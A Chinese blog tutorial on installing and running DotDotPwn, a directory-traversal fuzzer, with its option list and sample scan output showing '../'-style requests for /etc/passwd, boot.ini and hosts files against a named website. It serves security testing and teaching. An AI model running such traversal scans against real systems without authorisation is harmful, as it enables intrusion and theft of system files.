目录遍历工具DotDotPwn安装使用

最新推荐文章于 2024-06-13 09:35:03 发布
最新推荐文章于 2024-06-13 09:35:03 发布
阅读量1.3k 收藏 7
点赞数
分类专栏: 安全测试工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43487849/article/details/117435843
版权

1. DotDotPwn介绍

DotDotPwn是一个模糊测试工具,用于发现软件中的遍历目录漏洞,例如HTTP/FTP/TFTP服务器,Web平台的应用程序(如CMS,ERP,博客等)。
DotDotPwn是用perl编程语言编写的,可以在LNIX或Windows平台下运行。

2. DotDotPwn安装

1.需要perl环境,有的系统自带,可使用perl -v查看,若没有直接到官网下载安装:
https://www.perl.org/get.html
2. 下载工具:https://github.com/wireghoul/dotdotpwn
3. 解压:unzip dotdotpwn_master.zip
4. 进入解压后的目录:cd dotdotpwn_master
5. 查看用法:./dotdotpwn.pl

./dotdotpwn.pl                                    
#################################################################################
#                                                                               #
#  CubilFelino                                                       Chatsubo   #
#  Security Research Lab              and            [(in)Security Dark] Labs   #
#  chr1x.sectester.net                             chatsubo-labs.blogspot.com   #
#                                                                               #
#                               pr0udly present:                                #
#                                                                               #
#  ________            __  ________            __  __________                   #
#  \______ \    ____ _/  |_\______ \    ____ _/  |_\______   \__  _  __ ____    #
#   |    |  \  /  _ \\   __\|    |  \  /  _ \\   __\|     ___/\ \/ \/ //    \   #
#   |    `   \(  <_> )|  |  |    `   \(  <_> )|  |  |    |     \     /|   |  \  #
#  /_______  / \____/ |__| /_______  / \____/ |__|  |____|      \/\_/ |___|  /  #
#          \/                      \/                                      \/   #
#                              - DotDotPwn v3.0.2 -                             #
#                         The Directory Traversal Fuzzer                        #
#                         http://dotdotpwn.sectester.net                        #
#                            dotdotpwn@sectester.net                            #
#                                                                               #
#                               by chr1x & nitr0us                              #
#################################################################################

Usage: ./dotdotpwn.pl -m <module> -h <host> [OPTIONS]
        Available options:
        -m      Module [http | http-url | ftp | tftp | payload | stdout]
        -h      Hostname
        -O      Operating System detection for intelligent fuzzing (nmap)
        -o      Operating System type if known ("windows", "unix" or "generic")
        -s      Service version detection (banner grabber)
        -d      Depth of traversals (e.g. deepness 3 equals to ../../../; default: 6)
        -f      Specific filename (e.g. /etc/motd; default: according to OS detected, defaults in TraversalEngine.pm)
        -E      Add @Extra_files in TraversalEngine.pm (e.g. web.config, httpd.conf, etc.)
        -S      Use SSL for HTTP and Payload module (not needed for http-url, use a https:// url instead)
        -u      URL with the part to be fuzzed marked as TRAVERSAL (e.g. http://foo:8080/id.php?x=TRAVERSAL&y=31337)
        -k      Text pattern to match in the response (http-url & payload modules - e.g. "root:" if trying /etc/passwd)
        -p      Filename with the payload to be sent and the part to be fuzzed marked with the TRAVERSAL keyword
        -x      Port to connect (default: HTTP=80; FTP=21; TFTP=69)
        -t      Time in milliseconds between each test (default: 300 (.3 second))
        -X      Use the Bisection Algorithm to detect the exact deepness once a vulnerability has been found
        -e      File extension appended at the end of each fuzz string (e.g. ".php", ".jpg", ".inc")
        -U      Username (default: 'anonymous')
        -P      Password (default: 'dot@dot.pwn')
        -M      HTTP Method to use when using the 'http' module [GET | POST | HEAD | COPY | MOVE] (default: GET)
        -r      Report filename (default: 'HOST_MM-DD-YYYY_HOUR-MIN.txt')
        -b      Break after the first vulnerability is found
        -q      Quiet mode (doesn't print each attempt)
        -C      Continue if no data was received from host

3. DotDotPwn使用

输入:./dotdotpwn.pl -m http -O -s -S -h www.example.com
连接完成后会出现开始遍历的提示,点击enter开始扫描即可:

root@kali:~# dotdotpwn -m http -O -s -S -h www.hackfun.org
#################################################################################
#                                                                               #
#  CubilFelino                                                       Chatsubo   #
#  Security Research Lab              and            [(in)Security Dark] Labs   #
#  chr1x.sectester.net                             chatsubo-labs.blogspot.com   #
#                                                                               #
#                               pr0udly present:                                #
#                                                                               #
#  ________            __  ________            __  __________                   #
#  \______ \    ____ _/  |_\______ \    ____ _/  |_\______   \__  _  __ ____    #
#   |    |  \  /  _ \\   __\|    |  \  /  _ \\   __\|     ___/\ \/ \/ //    \   #
#   |    `   \(  <_> )|  |  |    `   \(  <_> )|  |  |    |     \     /|   |  \  #
#  /_______  / \____/ |__| /_______  / \____/ |__|  |____|      \/\_/ |___|  /  #
#          \/                      \/                                      \/   #
#                               - DotDotPwn v3.0 -                              #
#                         The Directory Traversal Fuzzer                        #
#                         http://dotdotpwn.sectester.net                        #
#                            dotdotpwn@sectester.net                            #
#                                                                               #
#                               by chr1x & nitr0us                              #
#################################################################################
​
[+] Report name: Reports/www.hackfun.org_10-23-2016_23-42.txt
​
[========== TARGET INFORMATION ==========]
[+] Hostname: www.hackfun.org
[+] Detecting Operating System (nmap) ...
[+] Operating System detected: 
[+] Protocol: http
[+] Port: 443
[+] Service detected:
nginx
[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (generic)
[+] Including Special sufixes
[+] Traversal Engine DONE ! - Total traversal tests created: 19680
​
[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)
​
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../etc/passwd
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../etc/issue
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../boot.ini
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../windows/system32/drivers/etc/hosts
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../etc/passwd
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../etc/issue
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../boot.ini
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../windows/system32/drivers/etc/hosts
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../etc/passwd
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../etc/issue
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../boot.ini
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../windows/system32/drivers/etc/hosts
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../etc/passwd
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../etc/issue
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../boot.ini
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../windows/system32/drivers/etc/hosts
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../../etc/passwd
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../../etc/issue
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../../boot.ini
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../../windows/system32/drivers/etc/hosts
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../../../etc/passwd
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../../../etc/issue
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../../../boot.ini
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../../../windows/system32/drivers/etc/hosts

————————————————
版权声明:本文参考了CSDN博主「时光途径」的原创文章,遵循CC 4.0 BY-SA版权协议,附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/SHIGUANGTUJING/article/details/88959824

Dejavu_^_^
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DotDotPwn使用教程
时光途径
04-01 1500
title: DotDotPwn categories: Information Gathering tags: [kali linux,dotdotpwn,information gathering,recon,http,exploitation tools] date: 2016-10-22 14:00:00 0x00 DotDotPwn介绍 DotDotPwn是一个非常灵活的智能模糊...
dotdotpwnDotDotPwn-目录遍历模糊器
02-05
dotdotpwnDotDotPwn-目录遍历模糊器
引领文件遍历新风潮 - Totalist 开源工具推荐 ✨
最新发布
gitblog_00077的博客
06-13 389
???? 引领文件遍历新风潮 - Totalist 开源工具推荐 ????✨ 项目地址:https://gitcode.com/lukeed/totalist 在浩瀚的代码海洋中寻找一款高效、简洁且功能强大的文件目录遍历工具?Totalist 正是你一直在找寻的答案!这不仅是一个简单的文件列表器,它更是一把解锁复杂文件管理难题的关键钥匙。 ???? 深入了解 Totalist 技术剖析 Totalist, 轻量级至...
目录遍历和文件读取/下载
qq_39511050的博客
09-15 868
目录遍历和文件读取/下载
探索安全漏洞:dotdotpwn
gitblog_00048的博客
03-18 344
探索安全漏洞:dotdotpwn dotdotpwn 是一个自动化工具,用于检测 Web 应用程序中的路径遍历漏洞。这个工具可以扫描你的应用程序,并寻找任何可能的路径遍历攻击。如果你是一个开发者或者安全专家,那么 dotdotpwn 可以帮助你在开发过程中更容易地发现这些漏洞。 什么是路径遍历漏洞? 路径遍历漏洞是一种常见的 Web 应用程序漏洞,它允许攻击者访问服务器上的任意文件。通过利用这种漏...
【burpsuite安全练兵场-服务端3】目录遍历漏洞-6个实验(全)
12-30 4208
【BP靶场portswigger-服务端3-目录遍历】6个实验-千文详解步骤
如何使用CrawlBox遍历爆破Web主机目录
MachineGunJoe666
05-24 274
CrawlBox是一款功能强大的Web主机目录遍历与爆破工具,在该工具的帮助下,广大研究人员可以轻松对目标Web主机/站点执行目录遍历,并以此来检测Web服务器的安全性。由于该工具基于Python 3开发,因此我们首先需要在本地设备上安装并配置好Python 3环境。该工具兼容Python 2.7.6和Python 3.8+环境。-v, --version:显示工具版本信息和退出;-d DELAY:设置每次请求之间的延迟间隔时间;-h, --help:显示工具帮助信息和退出;本项目的开发与发布遵循。
网站文件夹目录遍历
08-29
- 使用`os.walk()`遍历本地目录,生成所有可能的子目录路径。 - 对每个路径,构造完整的URL并用`requests.get()`发送请求。 - 检查响应状态,如果成功(HTTP状态码200),则记录该路径。 - 可以通过异常处理来...
游戏数据遍历工具V1.3
07-24
游戏数据遍历工具对那些需要研究游戏内存的开发者们多多少少是有一定帮助的. 通常游戏更新的地址都会改变,而偏移一般很少是不变的,利用本工具可根据以前的偏移帮助查新的基址.
DITRAEXTO:面向 Web 开发人员的目录遍历开发工具。-开源
07-19
Ditraexto 是一个旨在促进利用目录路径遍历缺陷的站点的项目。 这是一个有点难以检测的缺陷,但是当它被检测到时,它对受影响的站点或服务器来说是一种危险。 此安全漏洞有许多变体,从检测的简单级别到 cookie 或...
GoogleHacksSetup1.8_目录遍历工具.rar
01-07
《Google Hacks与目录遍历工具的深度解析》 在网络安全的世界中,了解并掌握Google Hacks和目录遍历技术是至关重要的技能之一。本文将深入探讨这两种技术,并结合具体的工具——GoogleHacksSetup1.8,来阐述它们在...
网站目录遍历软件
04-02
网站目录遍历软件 扫描 遍历网站 参看服务器类型 数据库类型
使用Files工具类对目录进行遍历
m0_51993863的博客
06-02 473
实现思路:使用Files的walkFileTree方法,该方法有两个参数,其中一个参数是要遍历目录的路径,另一个参数是FileVisitor接口,此处使用了该接口的实现类SimpleFileVisitor,该类实现了postVisitDirectory(遍历目录)和visitFile(遍历文件)方法。类(java.nio.file.Files)提供了多种方法来处理文件系统中的文件。比直接使用File文件要方便的多了。使用Files工具类可以对目录文件进行深度遍历
chatgpt赋能python:Python遍历目录寻找文件完全指南
sc17332889342的博客
06-18 250
本文由chatgpt生成,文章没有在chatgpt生成的基础上进行任何的修改。以上只是chatgpt能力的冰山一角。作为通用的Aigc大模型,只是展现它原本的实力。对于颠覆工作方式的ChatGPT,应该选择拥抱而不是抗拒,未来属于“会用”AI的人。🧡AI职场汇报智能办公文案写作效率提升教程 🧡专注于AI+职场+办公方向。下图是课程的整体大纲下图是AI职场汇报智能办公文案写作效率提升教程中用到的ai工具
dirsearch目录遍历工具安装使用
YouthBelief的博客
11-18 1519
dirsearch目录遍历工具安装使用安装github地址升级python到3.7安装依赖库使用查看详细使用方法常用的参数有 安装 github地址 https://codeload.github.com/maurosoria/dirsearch/zip/refs/heads/master 升级python到3.7 必须要求3.7以上 vps centos 7.6升级方法 或者自行百度 安装依赖库 pip3 install -r requirements.txt -i https://pypi.tun
目录遍历靶场
weixin_52125240的博客
11-04 542
首先进入靶场,先看到这样一个页面,一开始不清楚这个就是靶场环境,还以为自己进入到什么奇怪的买东西的网站。首先尝试的就是URL编码,在以前学习XSS的时候,就用到过URL编码,这里现把。首先还是打开靶场,复制图片链接,这里再次测试了一下绝对路径,但是返回是。,无论增加多少都没能返回想要的内容,于是采用绝对路径,目录遍历成功。,要求特定的文件路径进行验证,我们可以在给定的文件路径后面多加几个。然后搞明白了这个就是靶场,开始测试,一开始点击。测试了一下,还是没能成功,可能存在过滤。,抓包观察数据包,发现有一个。
[译]dotdotpwn使用
iteye_16188的博客
11-05 427
原文地址:https://github.com/wireghoul/dotdotpwn/blob/master/EXAMPLES.txt [b]= HTTP Module[/b] [code="java"]./dotdotpwn.pl -m http -h 192.168.1.1 -x 8080 -f /etc/hosts -k "localhost" -d 8 -t 200 -s[/...
Python进阶——GUI编程tkinter基础,并实现一个目录遍历工具
爱吃猫的小鱼干
02-24 1316
本文将对图形用户界面(Graphical User Interface,GUI)编程进行简要的介绍。我们将主要使用的GUI 工具包是Python 默认的GUI 库Tk,通过Python 的接口tkinter(“Tk interface”的缩写)可以访问Tk。 Tk 并不是最新和最好的,也没有包含最强大的GUI 构建模块集,但是它足够易用,你可以使用它构建能够运行在大多数平台下的GUI。 一 引...
文件、目录遍历器--os.walk
xiang_gina的博客
07-30 261
os.walk() 方法是一个简单易用的文件、目录遍历器,可以帮助我们高效的处理文件、目录方面的事情。top – 是你所要遍历目录的地址, 返回的是一个三元组(root,dirs,files)。os.walk() 方法用于通过在目录树中游走输出在目录中的文件名,向上或者向下。dirs 是一个 list ,内容是该文件夹中所有的目录的名字(不包括子目录)files 同样是 list , 内容是该文件夹中所有的文件(不包括子目录)root 所指的是当前正在遍历的这个文件夹的本身的地址。
cmake 目录遍历
07-27
在CMake中,可以使用循环语句来遍历目录。CMake提供了几个命令来实现目录遍历,其中包括`file(GLOB_RECURSE)`和`file(GLOB)`命令。`file(GLOB_RECURSE)`命令可以递归地遍历指定目录及其子目录中的文件,而`file(GLOB)`命令只会遍历指定目录中的文件。这些命令可以将匹配到的文件保存到一个变量中,然后可以在后续的构建过程中使用这些文件。例如,以下代码片段演示了如何使用`file(GLOB_RECURSE)`命令来遍历目录并获取所有的源文件: ``` file(GLOB_RECURSE SOURCE_FILES "${CMAKE_SOURCE_DIR}/src/*.cpp") ``` 上述代码将会遍历`src`目录及其子目录中的所有`.cpp`文件,并将结果保存到`SOURCE_FILES`变量中。您可以根据实际需求修改目录和文件的匹配模式。通过这种方式,您可以方便地获取到指定目录中的文件,并在构建过程中使用它们。 #### 引用[.reference_title] - *1* *2* *3* [CMake中遍历元素的技巧:foreach命令详解](https://blog.csdn.net/qq_21438461/article/details/129734933)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值